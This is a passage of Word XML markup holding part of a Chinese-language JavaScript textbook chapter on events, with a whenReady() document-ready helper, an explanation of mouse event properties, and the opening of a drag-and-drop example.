      <w:r>
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>17-1</w:t>
      </w:r>
      <w:r>
        <w:t>：当文档准备就绪时调用函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>传递函数给</w:t>
      </w:r>
      <w:r>
        <w:t>whenReady()</w:t>
      </w:r>
      <w:r>
        <w:t>，当文档解析完毕且为操作准备就绪时，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>函数将作为文档对象的方法调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*DOMContentLoaded</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>readystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件发生时会触发注册函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>一旦文档准备就绪，所有函数都将被调用，任何传递给</w:t>
      </w:r>
      <w:r>
        <w:t>whenReady()</w:t>
      </w:r>
      <w:r>
        <w:t>的函数都将立即调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var whenReady=(function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>这个函数返回</w:t>
      </w:r>
      <w:r>
        <w:t>whenReady()</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var funcs=[];//</w:t>
      </w:r>
      <w:r>
        <w:t>当获得事件时，要运行的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var ready=false;//</w:t>
      </w:r>
      <w:r>
        <w:t>当触发事件处理程序时，切换到</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>当文档准备就绪时，调用事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:r>
        <w:t>handler(e){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果已经运行过一次，只需要返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(ready)return;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果发生</w:t>
      </w:r>
      <w:r>
        <w:t>readystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>事件，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>但其状态不是</w:t>
      </w:r>
      <w:r>
        <w:t>"complete"</w:t>
      </w:r>
      <w:r>
        <w:t>的话，那么文档尚未准备好</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e.type==="readystatechange"</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>document.readyState!=="complete")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>return;//</w:t>
      </w:r>
      <w:r>
        <w:t>运行所有注册函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注意每次都要计算</w:t>
      </w:r>
      <w:r>
        <w:t>funcs.length</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>以防这些函数的调用可能会导致注册更多的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>funcs.le</w:t>
      </w:r>
      <w:r>
        <w:t>ngth;i++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>funcs[i].call(document);//</w:t>
      </w:r>
      <w:r>
        <w:t>现在设置</w:t>
      </w:r>
      <w:r>
        <w:t>ready</w:t>
      </w:r>
      <w:r>
        <w:t>标识为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，并移除所有函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ready=true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>funcs=null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>为接收到的任何事件注册处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(document.addEventListener){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.addEventListener("DOMContentLoaded",handler,false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.addEventListener("readystatechange",handler,false)</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.addEventListener("load",handler,false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(document.attachEvent){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.attachEvent("onreadystatechange",handler);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.attachEvent("onload",handler);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>whenReady()</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return function whenReady(f){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(ready)f.call(document);//</w:t>
      </w:r>
      <w:r>
        <w:t>若准备完毕，只需要运行它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else funcs.push(f);//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，加入队列等候</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43" w:name="17_5_Shu_Biao_Shi_Jian_"/>
      <w:r>
        <w:t>17.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　鼠标事件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="443"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>与鼠标相关的事件有不少，表</w:t>
      </w:r>
      <w:r>
        <w:t>17-1</w:t>
      </w:r>
      <w:r>
        <w:t>全部把它们列出了。除</w:t>
      </w:r>
      <w:r>
        <w:t>"mouseenter"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"mouseleave"</w:t>
      </w:r>
      <w:r>
        <w:t>外的所有鼠标事件都能冒泡。链接和提交按钮上的</w:t>
      </w:r>
      <w:r>
        <w:t>click</w:t>
      </w:r>
      <w:r>
        <w:t>事件都有默认操作且能够阻止。可以取消上下文菜单事件来阻止显示上下文菜单，但一些浏览器有配置选项导致不能取消上下文菜单。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251699200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4106173" cy="3006305"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="40" name="00040.jpeg" descr="000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00040.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4106173" cy="3006305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>传递给鼠标事件处理程序的事件对象有</w:t>
      </w:r>
      <w:r>
        <w:t>client</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>clientY</w:t>
      </w:r>
      <w:r>
        <w:t>属性，它们指定了鼠标指针相对于包含窗口的坐标。加入窗口的滚动偏移量（见示例</w:t>
      </w:r>
      <w:r>
        <w:t>15-8</w:t>
      </w:r>
      <w:r>
        <w:t>）就可以把鼠标位置转换成文档坐标。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>altKey</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>ctrlKey</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>metaKey</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>shiftKey</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定了当事件发生时是否有各种键盘辅助键按下。例如，这让你能够区分普通单击和按着</w:t>
      </w:r>
      <w:r>
        <w:t>Shift</w:t>
      </w:r>
      <w:r>
        <w:t>键的单击。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定当事件发生时哪个鼠标按键按下，但是，不同浏览器给这个属性赋不同的值，所以它很难用，更多详细信息请看</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>参考页。某些浏览器只在单击左键时才触发</w:t>
      </w:r>
      <w:r>
        <w:t>click</w:t>
      </w:r>
      <w:r>
        <w:t>事件，所以如果需要探测其他键的单击需要监听</w:t>
      </w:r>
      <w:r>
        <w:t>mousedown</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>mouseup</w:t>
      </w:r>
      <w:r>
        <w:t>事件。通常</w:t>
      </w:r>
      <w:r>
        <w:t>contextmenu</w:t>
      </w:r>
      <w:r>
        <w:t>事件发生的标志是右击，但如上所述，当事件发生时可能无法阻止上下文菜单的显示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>鼠标事件对象有一些其他的鼠标特定属性，但它们并不常用，具体请看</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>参考页的列表。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>17-2</w:t>
      </w:r>
      <w:r>
        <w:t>展示了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:t>drag()</w:t>
      </w:r>
      <w:r>
        <w:t>，它会在</w:t>
      </w:r>
      <w:r>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>ousedown</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序中调用，其允许用户拖放绝对定位的文档元素。</w:t>
      </w:r>
      <w:r>
        <w:t>drag()</w:t>
      </w:r>
      <w:r>
        <w:t>能够在</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件模型中运行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>drag()</w:t>
      </w:r>
      <w:r>
        <w:t>接受两个参数。第一个是要拖动的元素，它可以是发生</w:t>
      </w:r>
      <w:r>
        <w:t>mousedown</w:t>
      </w:r>
      <w:r>
        <w:t>事件的元素或包含元素（例如，你可能允许用户拖动的元素看起来像标题栏，而拖动的包含元素像窗口）。然而，无论是哪种情况，它必须是使用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS position</w:t>
      </w:r>
      <w:r>
        <w:t>属性绝对定位的文档元素。第二个参数是触发</w:t>
      </w:r>
      <w:r>
        <w:t>mousedown</w:t>
      </w:r>
      <w:r>
        <w:t>事件的事件对象。下面是一个使用</w:t>
      </w:r>
      <w:r>
        <w:t>drag()</w:t>
      </w:r>
      <w:r>
        <w:t>的简单例子，它定义了用户在按下</w:t>
      </w:r>
      <w:r>
        <w:t>Shift</w:t>
      </w:r>
      <w:r>
        <w:t>键时能够拖动的＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>img src="draggable.gif"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>style="position:absolute;left:100px;top:100px;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>onmousedown="if(event.shiftKey)drag(this,event);"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>drag()</w:t>
      </w:r>
      <w:r>
        <w:t>函数把</w:t>
      </w:r>
      <w:r>
        <w:t>mousedown</w:t>
      </w:r>
      <w:r>
        <w:t>事件发生的位置转换为文档坐标，这是为了计算鼠标指针到正在移动的元素左上角之间的距离。示例</w:t>
      </w:r>
      <w:r>
        <w:t>15-8</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>getScrollOffsets()</w:t>
      </w:r>
      <w:r>
        <w:t>帮助坐标转换。然后，</w:t>
      </w:r>
      <w:r>
        <w:t>drag()</w:t>
      </w:r>
      <w:r>
        <w:t>注册了接</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>着</w:t>
      </w:r>
      <w:r>
        <w:t>mousedown</w:t>
      </w:r>
      <w:r>
        <w:t>事件发生的</w:t>
      </w:r>
      <w:r>
        <w:t>mousemo</w:t>
      </w:r>
      <w:r>
        <w:t>ve</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>mouseup</w:t>
      </w:r>
      <w:r>
        <w:t>事件的事件处理程序。</w:t>
      </w:r>
      <w:r>
        <w:t>mousemove</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序用于响应文档元素的移动，而</w:t>
      </w:r>
      <w:r>
        <w:t>mouseup</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序用于注销自己和</w:t>
      </w:r>
      <w:r>
        <w:t>mousemove</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>值得注意的是</w:t>
      </w:r>
      <w:r>
        <w:t>mousemove</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>mouseup</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序注册为捕获事件处理程序。这是因为用户可能移动鼠标比其后的文档元素更快，如果这种情况发生，某些</w:t>
      </w:r>
      <w:r>
        <w:t>mousemove</w:t>
      </w:r>
      <w:r>
        <w:t>事件会发生在原始目标元素之外。没有捕获，这些事件将无法分派正确的处理程序。</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件模型无法像标准事件模型那样提供事件捕获，但它在这种情况下有一个专门用于捕获鼠标事件的</w:t>
      </w:r>
      <w:r>
        <w:t>setCap</w:t>
      </w:r>
      <w:r>
        <w:t>ture()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。下面的示例代码会展示它是如何工作的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后，注意</w:t>
      </w:r>
      <w:r>
        <w:t>drag()</w:t>
      </w:r>
      <w:r>
        <w:t>中定义的</w:t>
      </w:r>
      <w:r>
        <w:t>moveHandler()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>upHandler()</w:t>
      </w:r>
      <w:r>
        <w:t>函数。由于在嵌套的作用域中定义它们，因此它们能使用</w:t>
      </w:r>
      <w:r>
        <w:t>drag()</w:t>
      </w:r>
      <w:r>
        <w:t>的参数和本地变量，这将大大简化它们的实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>17-2</w:t>
      </w:r>
      <w:r>
        <w:t>：拖动文档元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*Drag.js</w:t>
      </w:r>
      <w:r>
        <w:t>：拖动绝对定位的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这个模块定义了一个</w:t>
      </w:r>
      <w:r>
        <w:t>drag()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，它用于</w:t>
      </w:r>
      <w:r>
        <w:t>mousedown</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序的调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>随后的</w:t>
      </w:r>
      <w:r>
        <w:t>mousemove</w:t>
      </w:r>
      <w:r>
        <w:t>事件将移动指定元素，</w:t>
      </w:r>
      <w:r>
        <w:t>mouseup</w:t>
      </w:r>
      <w:r>
        <w:t>事件将终止拖动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这些实现能同标准和</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>两种事件模型一起工作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>它需要用到本书其他地方介绍的</w:t>
      </w:r>
      <w:r>
        <w:t>getScrollOffsets()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>参数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*elementToDrag</w:t>
      </w:r>
      <w:r>
        <w:t>：接收</w:t>
      </w:r>
      <w:r>
